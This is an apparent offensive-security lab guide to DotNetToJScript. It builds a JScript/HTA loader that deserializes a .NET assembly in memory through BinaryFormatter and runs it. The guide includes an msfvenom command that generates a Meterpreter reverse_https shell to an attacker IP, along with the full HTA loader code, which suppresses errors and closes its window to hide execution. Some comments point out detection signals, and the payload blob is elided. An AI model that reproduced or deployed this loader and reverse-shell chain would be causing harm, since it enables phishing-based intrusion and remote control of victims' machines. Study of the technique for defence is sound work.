DotNetToJscript
A tool to create a JScript file which loads a .NET v2 assembly from memory
Setup
Build TestClass.cs
Copy .exe and .dll from -> C:\Tools\DotNetToJScript-master\DotNetToJScript\bin\Release
Paste -> C:\Tools
Copy .dll from -> C:\Tools\DotNetToJScript-master\ExampleAssembly\bin\Release (or x64 folder -> \ExampleAssembly\bin\x64)
Paste -> C:\Tools (.dll files must be in place when executing a DotNetToJscript program)
cmd.exe C:\Tools
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
Example
In this example, Meterpreter reverse shellcode is used:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.45.242 LPORT=443 -f csharp
After following the steps in Setup, the content of the resulting demo.js file can be placed in a .hta file to execute the JScript.
<html>
<head>
<script language="JScript">
// Sets COMPLUS_Version in the process environment so that the .NET COM objects
// created further down are hosted by the v4.0.30319 CLR. A script host writing
// this variable is itself a useful hunting signal.
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
// Intentionally a no-op: the catch block at the bottom routes every error here,
// so a failed deserialization or assembly load produces no visible output.
function debug(s) {}
// Decodes a base64 string into a System.IO.MemoryStream using .NET classes reached
// through COM (ASCIIEncoding, FromBase64Transform, MemoryStream). From a monitoring
// standpoint, a script host instantiating System.* ActiveX objects is the
// distinctive signature of this loader.
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
// The _2 / _4 suffixes are how COM interop exposes overloaded .NET methods.
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
// Decoded size is taken from the 4:3 base64 ratio; presumably the generated
// input carries no '=' padding, otherwise this count would exceed the decoded length.
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
// Base64 BinaryFormatter payload. The fragments visible here reference
// System.DelegateSerializationHolder and "System.Reflection.Assembly Load(Byte[])",
// so the graph appears to be a serialized delegate bound to Assembly.Load(byte[]).
// The ". . ." line marks where the page elided the bulk of the blob; the listing is
// therefore not runnable as printed.
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
. . .
"AAAAAAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxl"+
"Y3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL";
// Name of the type instantiated from the loaded assembly (see TestClass.cs in Setup).
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
// BinaryFormatter.Deserialize over a caller-supplied byte stream is the core of the
// technique; this is exactly why BinaryFormatter is documented as unsafe for untrusted data.
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var d = fmt.Deserialize_2(stm);
// Single null argument for the delegate invoked below.
al.Add(undefined);
// Invoking the deserialized delegate presumably yields the loaded assembly (per the
// Load(Byte[]) reference above); the entry class is then instantiated from it.
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
} catch (e) {
debug(e.message);
}
</script>
</head>
<body>
<script language="JScript">
// Closes the HTA window once the script in <head> has run, so nothing stays on
// screen; an HTA that appears and immediately vanishes is itself worth noting in telemetry.
self.close();
</script>
</body>
</html>